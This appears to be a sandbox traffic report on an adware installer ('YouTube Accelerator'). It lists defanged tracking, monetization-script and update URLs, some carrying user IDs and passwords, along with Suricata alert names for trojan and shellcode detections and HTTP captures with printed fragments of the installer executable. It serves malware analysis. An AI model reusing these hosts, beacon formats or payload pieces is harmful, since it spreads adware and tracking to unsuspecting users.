    hxxp://online.GOOBZO.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=1&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1401908134&SBPIDS=1
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 23.0.160.200
    hxxp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1
    hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=WVbe3wHlwMFN39k7Xfv8ZYJy6t0jZcn/3Pumfblmu5B9EKWfiY9Pr/lWymhtcc3oSGExqW4qn7xbfNvkjTiX5MYfDaHf3e795OnEgGr9SE8pLMPVU5rYAaQ9fvZLzhpPHqZTozeGZkFDIYxMHAAwfsy37oES63mGl8axoeNMkn46SEXCM79iefveis23DNM6naQQuHaXH0P7e7Z5lK2CBt35bH/eTc70z3EdWN1pnr gmTUgTv 1htN1EBSRfGX1ciiAZ/vb5amGSD/1t3LtazSyzm0szDxlLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBy8ymb4qgtISeTiTeDBaDsYF8DSQNk3h1UhHWwrE8V1N8HrzshzK1L 3T6bhmIsCigFI5wSubXkxw0swgI0gHqEPyWxZkil7pIhSztea6z1Rw==
    hxxp://test.youtubeaccelerator.com/youtube_accelerator/wizardtest/SMALLTEST.HTM?random=244890&mode=nolsp
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/similar_products_m.js?ver=20&rnd=41 69.16.175.10
    hxxp://logs.clientstatsservice.com/monetization.gif?event=3&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de 69.16.175.10
    hxxp://stats.clientstatsservice.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908103&procruntime=35&rnd=1401908138 54.231.2.244
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js?ver=51&rnd=41 69.16.175.10
    hxxp://logs.clientstatsservice.com/monetization.gif?event=4&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&iep=1&chp=na&ffp=na&browser=ie,de 69.16.175.10
    hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=37A8KpTgCn8 8U9Mk34kw2d IPgbweuc3RDD4M2MKnlkNeKJ xgctdGdqHePycrYlEzjD3RV2P zo7anpTgKuUuWYfM6izmf8Jo6a7hQsoV XTIrvDDxtNQemHjKoviJv6nUSaXbu5kh6O1xoOM2Wwr5wRTDRQspifHi86VNADDPCU8GQVxGgK2dgS8O/TaQhbdsE06OTTBOUDdMBQAxomYsAOzz7hm2v6mMnRFV9GhIj5Qq2ZmLjxaaNW52wnP0R2 KBcqjJpLQObBpEzucPnUWDi3cBRthwZ hsz0Po2FTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PxWwjEc sn2M3eQ9XFbt1hwldgUs5GwsN3teEmMBnHkEwqUveKdtVhw945ujwMCrw90 8ZIB Duyzgolj5eZNKfv3I83DDLqkm2zLBWAsWL
    hxxp://logs.clientstatsservice.com/monetization.gif?event=4&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&iep=1&chp=na&ffp=na&browser=ie,de 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js?ver=8&rnd=41 69.16.175.10
    hxxp://stats.clientstatsservice.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908096&procruntime=34&rnd=1401908130 54.231.2.244
    hxxp://js.clientstatsservice.com/plugin/apps/32850/js/na/ie/app_code.js?ver=200&rnd=6387 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_5_j_m.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugin/apps/35510/manifest/1_34_05_12/ie6/manifest.xml?ver=268&rnd=6271 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js?ver=50&rnd=41 69.16.175.10
    hxxp://update.clientstatsservice.com/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/ping.xml?rand=24814
    hxxp://update.clientstatsservice.com/installer_updates/000046/update.json
    hxxp://stats.clientstatsservice.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908094&procruntime=36&rnd=1401908130 54.231.2.244
    hxxp://update.clientstatsservice.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=24801
    hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=KC46TpkJIZzvtemz1TdLVuWnbh8hpWrAeq10/GADmDBu89fJv3K/CWQ14on7GBy1f82ojUnVmk1jg4jhBREgIvCV4d3G7GmUPoZDv5/7A 4Cbsn9VEgrCHCV2BSzkbCw3e14SYwGceQTCpS94p21WHD3jm6PAwKvD3T7xkgH4O7LOCiWPl5k0ouHKS7KUiLNWuHFN9lRYXm3sb/Jc9bi4CY6tkU PjWGlHVWy8T0I6XgvyObhcmYFVDq65iJ/PSiZue/pvWoG6/w1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVp3jd05TL7uAHr0KKVswpUMOZdMqy4QvCJDBHj1HSSAn7FonSkUF/RQKURfjHIrK99zMkIAxERs/2kYTsY1op3mQo22RHlSfKyHVloWsfii4
    hxxp://update.clientstatsservice.com/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808&w=3:YP9H98JGonPq-z8K8ZDNEoBZF0_1DKLBOVchsmR1rKhzvo080SvcrbvVqO024phbkOXhv8Oj8EjHaL0anoDmMXwRuezydLQrfC6FVKLMOqXspCJqg8Sq6V9oCpSjkralK86J5UI4Ao4LnhS5nqLPx1I9muwRfYQ3SIN5JeFyDjE
    hxxp://online.GOOBZO.com/online/RegisterAnon.aspx?ProductID=12000&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=
    hxxp://online.GOOBZO.com/online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=5&EMail=&Newsletter=&V=3.3.9.4&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=
    hxxp://stats.clientstatsservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=0&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908094&procruntime=4&rnd=1401908098 54.231.2.244
    hxxp://stats.clientstatsservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=0&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908096&procruntime=2&rnd=1401908098 54.231.2.244


    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
    ET POLICY Executable served from Amazon S3
    ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
    ET POLICY Unsupported/Fake Windows NT Version 5.0
    ET MALWARE Win32/Toolbar.CrossRider.A Checkin
    ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

    Traffic

    GET /yta33_full.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 250000-499999/5377936
    Age: 76472
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: nTXseHHjh8qzEnPDPzQvKzRixyBMnAlqkQB5ZyXtwfMZ81DcDjG_5g==
    ...A.......749...%~I..&...G.U.J .!7..H M.{.N.........^.C....._..'..eDd
    .k....TT..='..u......>. .....2<,7_. ...i.V.#.q....2..]......:..0
    V. @s..X._.,...t.e....=...jr........k...&v$. .%F........{....Y...?....
    k.E...z#i.%.E......z..".o........%=..\....-...R..1*...W....nM#.3... X.
    ...}.\......oX......T{....%...........|M@~w.t..&g...^:.L...|.[......9^
    ...e.H(....=..)7...........(.fwMM6K. WI0....#c...s..?)Z].......u..Z.Q.
    \..u.,u.}~Ff.].%....5.l>.. c.....V...f....C....gS..LbMM......1.....
    ..(..b'I.JaOW~Kn.$.g..\..l..|7U....Vz.V..mV..`..q.WD5.Z.Ms........Xg..
    ........p.7..z....[..o.CJ...fw..._~...B-.r....O9....[..*.....TO`k_.?.y
    .y....9...&#.P..f.Y....3[............=.N.H1R....B.......... ..xW..r.iN
    D">........3...H./..u#....fc..3.. .A.....w..7..).w^....RN..G....Zu.
    .,..n..h... `..C......FM....).(~K6.}cD...|.<D...[C`.47....;...fN...
    .2_9/.....v^.*..h'......:.#dK...=.........fV.......=t.g.i0....L.... @.
    .......|?..`.].q.|..j.E?....x35..*.>^.........#..U.]....&.B~..4U...
    JJi.G..i*.e..j..|.....r.a....&...\.....(.8..,i..8k.&..~..!.P.8_.....I.
    ..i..o].E4.^...dO....gl.^..L....&Y....._.(.rM.E.-.].h.IN....z...C...B.
    .e.f..qG.......v.Z.M...?..[.^v..e.&N...^O|.&..<=. @.R.i6....3...b.
    .\i...2$.!. .%%...(#..........8.L..X..a8.z.........CW.......C.|...C...
    3..z...........o#.....m-k.%j...l...\..].&W.NW.6W.VW.fW......LX..g.r...
    _o._.;...2.R......,JZf.DK-A......z<....Mu^..?<....w.PR.....5...t
    E.......... .....A&......i...\.=:)..qrby5.k.#.7..2.l..%......|{."q..m.
    ....F(..x..D..,....:.=K...._g..VX...Q..!.t....x*g.....~......^._..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 750000-999999/5377936
    Age: 76476
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: U8J7L3sJyxIwvF3b_IlbYO1G7mqzMtEmgCvb34bZYz_RcD0MQQd0zg==
    Z9.........&.1x#..B..U.@./h.gD....5......m..[..tP...W..9...].....h...4
    .)..u.....`6.....U6.i.G...0.1<L....T .}.....-..) m.%.`..P.KVq.4.Y..
    ..x.Xc.....Fs.,.vr..H...C...|........>.....7t....;..?..7..I" 5...x#
    _.._.w.w7..n.p.o2.x-....H.gS .._3..p.t,.a..<g...e..Z..:[email protected]?..
    c..C7V...n....k>....B.\.\!L.!Q.rj....6..........9f...^>..Re..oMY
    (...$ ...3Wh.]..T......Dv.X.....;N.....=.s..$.|.d:...pi......I.....?K9
    .5= G..'c/..`..U. W.|...iA..N.}.0........`.....]Be.?..K..c..0...2...S.
    EQ....4A.W.61..........L..s.....O....$. A..>.....&0>(...'m.....t
    ..$...Dc.OF.c..Y.Sf7LcO{1_...fx6..0....>{."e..?-%%.>M..........&
    gt;.....JK"_.i....w.....k....X)....|*)3|..T...j.{...63MC.z..m.=..Q%..q
    .....j.?...... M.^"q.&..b.!4..[6...4.P`.......W...%Y8.....s(.-...Y.9B.
    ..S9?.. Y.JMg...h...s.........,......B.Q.........$.D....)..Izya....u..
    ..0./(......c ...]..i1.S@^.l`..\t..E..{.N^.(5?..x..J.....#at|oX...R...
    ...y....X....E.L.....X=..j...)...V.M..../....g.RH.^..Q.x.a.. $.T.a.c..
    .#......!.sCZ..[&WiDcb...W.^Cb....~.z....A.P.J....... .-h..ej.....Q.i.
    ...P..0.FMR. .!.b..|..&....%.^..,....5..&.;..4s..F..dh.'...t.,.k.vQKm.
    f.........{gV5f.T...%..6..f....Xc...4...6..............[[email protected]..
    .p..8#h4....x.#.!:[email protected]...`!..#.4..{..dI.-..f.6*L.O.....t....
    I..e.".C...U[.A".`...t.0#...qi. ....E{,im.:H.I?E.n..}...h9...d.;m.IL..
    ?..x.....&......Cv8.{.=..Y..J..g..8sX...(..:hGM.......,C.q..Z....-S.(m
    ^..E[.o.k.Qzf%V.s#l.O..o.[...9..MQ"..BM..U...O..o...).q.{^F..C.y-.l...
    ..........Dm..,a.T.(bu{........-.....k2.y...M...../....7..;...)/..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1250000-1499999/5377936
    Age: 76480
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: OTWFwXo5fui8DS3mI-AUeUdZtGGqKK0-F9xHwDdp-JtJGfaKqy3uMg==
    ...:.x.K ..x9.....>J.$.\.|.k......E.p..wk.g...ZP...:....t3....n.#..
    F...........u......1.^....s.......T..|A..... |O~.F....-eK=.....7......
    \.r...H.j.|4...q...mLo..|....<|/.....3.1j..V...*.....&.>..\. h..
    q_....Q......*O...?..6..W....wR..=..Y.T........9eso..cy.B<.q.......
    C...&.F....?.q.o.R...p.n.g..3Q......u5Z'b.EDs..Q..#.y..}v.D.t..|!N.S.i
    ..D....|.&P~.5......M=.....~K...x....Y.6.6..".v....p........L.!.y...Ug
    .F*&N..]8.....?<ga_.}.}.o.........."......i..........v.[...../2.. .
    j.|......Gh4>S.j......c............o..6"x.r.2.....[..Zn.dv.n.V. ...
    !...8..P..R...GJ...8...5p1Q&..[.(.q>.c.........Dng...,k..Kl......(.
    .M.......9|..s.4... .o...}..!..........2y...F...J1<s,.\..`>.}zIF
    P..J...V.v....\.....S.V...x.b.C^.n.OI...uD1..e.X.x.2.D..k..7.k^<...
    ...@`-..%R.e>II.&...h.Dq%.../o....B...[.R............8yCU.|.|MU.E..
    *.zUY.. . l.E.G.kP....PR...[=...8.......9k.....<.n....^....,uB.\..J
    ......u.5..<....'.dJ .&......HNN...>U.0._......Dj..............{
    G.AP.DO...l..=..-[.)NB.._.l......6T....................}.F...(..'.6.W_
    ..K...Lg.Yed;.lD~..f..4Cu.i_.........&{L%[email protected]..~;...$..
    ......n.L6...i..0.gz[93..[..!.de.S.....9.......S..W.'..#..l.....5.)>
    ;......J.1C......L.y....f `p..s4..l.....e...!..yeVz<........t.U..Vi
    .we_.i.Z}C...#...........QH.I....G.|[email protected]"_t?....T.\....
    |$h.}....A6U.Z..fN..D@*..]..9L...b.f}"......iP.2F;w\.aS#..............
    yh....y.u....=J... ...u..9KM...vYS..3.P....b.....4'[..7.l.S$...g.y..v.
    e.._o)5.p.....5.]....I6XN....~..t:..It.V~..gxn.'.k.G.1.R........l.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1750000-1999999/5377936
    Age: 76484
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: JcHimFVPRcK6FzxHvlfPunFUr6a5zlpjJiamu1x3PrCG8f3OcujpcA==
    [..#j..u.........r...J. ..o]. ....ihc.....bU...4.P..vC....I.........Q 
    r:yxu..I..O.s...n......#j.....Yr.<.P;..%U.qu.D..!v...._WK.Ur....B..
    ...;6....SF..%J..G.Q<...t.........,.7,..j.G.Y{...e.....I..w.. F@...
    ?G....=0...TV.H.b...s.T.....].n.w.....xn:4.4...:X].X..Q.C.c..p.......k
    ...C....~.n. .....Cx~......P>q.w*=.........P.....7.Oa_...)I..<.#
    ..v.D....g......~/:.2.K...:K......xZM..!.....}(eE*...X4.....E....>.
    B...r.e....c......^.....1......r.yI......O._n6.."}m.Qi....x.,L.D..s.2.
    ..L.....H.l.. ..#........o9.vd../v.....~..:.......c...nG..G..K..2...`.
    .............."...&.c..oLA.{.....[. s-...Q.....Xd<.|..h....8......(
    ...j..~.p.)......?j....f.I....!..D..I.4...|.....h1......9.(.}".6..[..T
    .3`.....5.9...).?.!..SI..0.s.&........$..{.a... .a...t.$@...(...z,Og..
    '0.%N..f.S_...3SU...tv...8..8.')...`..nd.e....'.2......Xb.....r.....&l
    t;.:....Nv.N..T5I.=.z.....l9V....kP...T.6B..][email protected]......
    0.$...........4.!..K.M.s..0.L.g.O.....6.`.o...A.Q..8k..R..0..3.......|
    .........E.!..s.G5..<.z.N.........D..]...............k.JW6..F...='1
    ..J..3*..n:B..u(b..m../.;.T..........>].M..&.r..Bl..`.......YY.aj..
    Ru6b.....Sd....#u]...7....>w..U{mEY.C ..r.;E.Y.O............%..G.{2
    ...."!....\dg..H...Y...e.....Z3.a...<.n.........`qT...4...Ub.......
    ......L#&f.3....{%....]..LiZ|.....I..s.....$9(..o....R..\.(\...:....v.
    b.~..|e9%....g....N..,W.$W.D~I.;..=Gi.y6.......#4M...*Jo,.J.......{...
    ...#.(...L....P..7.I.5..............e....f.9....Z'....C..S..~..2.. .."
    7#.-..........j.0. e= ;.Q..Z.....F...$RB..j.....{.nz.$%L.....>.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=2250000-2499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2250000-2499999/5377936
    Age: 76489
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: JYgHEWgQFxCCHEBVwunjNKSJ4aaNCSpijH2Te0DQu6A3XykNtPEKqA==
    ....nddu.6`...=u.g.z.........=8.\.......b#....o..s.s.w...T.0....$..?}.
    3.1...UG.h./5..9)...,;."..n..P......:[..O....$.O..b.....].Y;J.jZ..5f.I
    .......Q).%[email protected]..^dW.&..^%Y.....6..=..r.N.zn.Y..9w.^..Lp..3`U.#.
    .zbz..s.N......jUm...:....|=.~...9G.3.'L..e...`.k..t..?~.....%}...]...
    ....E.)...._.|..U.'..=g;.U.............:...t.7J..2.C.D.....G.CV..rj}..
    .....8.Fj&...X.?.a.f......_. ...i.\I.....Xb..C.T.......Z.QVa.....?.b..
    .?0....... ........... .../[email protected].....$.`>.%
    .bn:...Z.K....3.3o....K.u.K.6c#K....'....N.a..........?...tk.g.....5.I
    ..Mc&....{a.T......oJ{^\.IO......][email protected]".q..ZC..
    ...SM..-i..|o6<..h8m._C..k.1.g..aL..j~-VbAq.N.......B[9..T....`....
    ...oM2.y*..L.........vM........`;.C........v.(..<X.2]~...LnW.{.....
    KH..#.? M..(|.YT.U.....'......./*;hkOv(r.Ss....Q7;.\..w.}...,..T._....
    ....z....\..m..=...N#)...A..iQ....F >...q--(;.6.[d....s..2.h>..&
    lt;..............i..]".(.tcw.......@!6....lP.;.4..y..1n/.4.V3L.H.>.
    P..UN...'T<.D.........?.9).r.\A....z...q`A.........P..O..[P.r. <
    .k.....w*.^..lo..z....jP..p*5(.nQk.._J.|....FDf..-1..(s...^...3H.....l
    B.../[email protected]*.|\. ..........6J.9.F`.7.P;.7..{q.0{M.`u..w->d`.i.Y.
    .(....G.U>......f..Q..8...^5[&....#e.F}.......s.=.3..ti............
    Z..OfhB.qW.|..........3..W...Xw...`. c.<......5/]......~..*.... ...
    ...Wq.j..S.......(...3.5...&......6..G.erI. ^n..p...f.....z........W.
    ..O.A...9...P{.NumW..4.-.....9x..(.Z,......A..3........|....p..$......
    |..m.b...o~.V..l.......5....tmVH.S.C.......}.j.6[..{....K>..A..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=3250000-3499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3250000-3499999/5377936
    Age: 76499
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Oo0KTws6L764jVqfw1sAYMxhT_rRzLvqT47y-ySrjrPrUhGf3WxITA==
    ....=.FD..kF.,Ac&(..\k....Er .V....J..../"... b..."<.?... ........K
    [email protected]...:C..q1D.....BD..,B...'D...G. I^L...2.j.`..A..!\. ...V.`DX..
    0D...BD..tp....F...[.h.".....aE...0....M.o..m.>}....P@...(.l(... =.
    ~........a.{...O..Q.....-E...,..r..r.U.x...2]..R.....7bL...j..hED.`6..
    ..=\B..\.....m<m.......wj..;}.q..{.P....nh.B...5i18.[.{n...l..M.w.-
    ....G..W>....bi.....9.....r....E..`B.9..~c....g.....~...lX.."..M;..
    ..L.<.Q.....f...g..7.l..6TPA.E{....n.0..y...c.....~..)...Q..].[...=
    .c......A-.<1...s../.m).a..W........'..4..5......).:.Z.....As...X..
    ([email protected]...../.`.Q.|........5wS..2........AC.b.....S]..Q.D...;i...0....
    .do.{..b.G....r..4......V..w.A...[z..........a..^.n.......O!.y[.."....
    W:......T....o.?W...o.. ....5..p..&H,z ..... [email protected].$.nB.U.|<.@AnU
    .b..e..c.p.t....)wS.....m.}..c...l......D..S..0..%.q_....o....].Q.....
    [email protected]...\[email protected]..
    ...I...s.Da...'7nH...b.i*...]D...F..V.X.. .p..A._c.)e]g.B....BB.......
    ..t........N.M......m.#[email protected].....@U^p. Q....@..
    X..1..]...o@o..;8:.kn.<@.....k-...92..[.).....2./...O.m.....^z.j,..
    ...i...8..r..,.\.p.g.[A..c..Dc..h'...t....x.3. [email protected]....
    .....p......g...<..........!7.....k.......ehY..v.g..Z[.H.lh..g..@.]
    ..."N.aA4..........5..,.}[email protected].#......@..
    ..n...E..<m..b...;%p...e...@..=....Z....w <....*.o..D.......A.!.
    l..&...,....y9.o.....b.r....w.2...5e...5$..\[email protected]....#.( :.
    I.[....*..#...<C.....d...C............} 2.............`..-..6..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=3750000-3999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3750000-3999999/5377936
    Age: 76502
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: T4Bfuc8RjixY3vxLPSmSjCsSNQHIOXb2J6g5-zQGgx5P2Ho6zCvZ7A==
    ..Z.[..Z.O...... N...\..[.T..T...{....%.... U.Vz...*.)..........x'00.@
    ..}S...Ux..3......%..)...].;....Z......nm....tk> .....p#..N..^r3v.
    ...\.'....c...S....B..2D....yS...!K.e.ug..q..IH[.[.\Q.....*...qO.H....
    o=G.............kp....Sx......0....Q*.1T_..:..!.b"K5.7.).c...JJ.n.....
    Q6......`..M.....a.........u...6.D)...|.`..#.;^.x6...3.R..g.R......!P.
    ....m.......m......=@....&z....H.!.)..J.]4..T.A......c......{.*.......
    ..A$..O#J.T.......%. ....$...g.6.........W.] @.`.....*......h.`)....t.
    .....TJ...)..FT..h.....#.u.......... ...p.U..I.#.r..=R@}...x{.N*...p.g
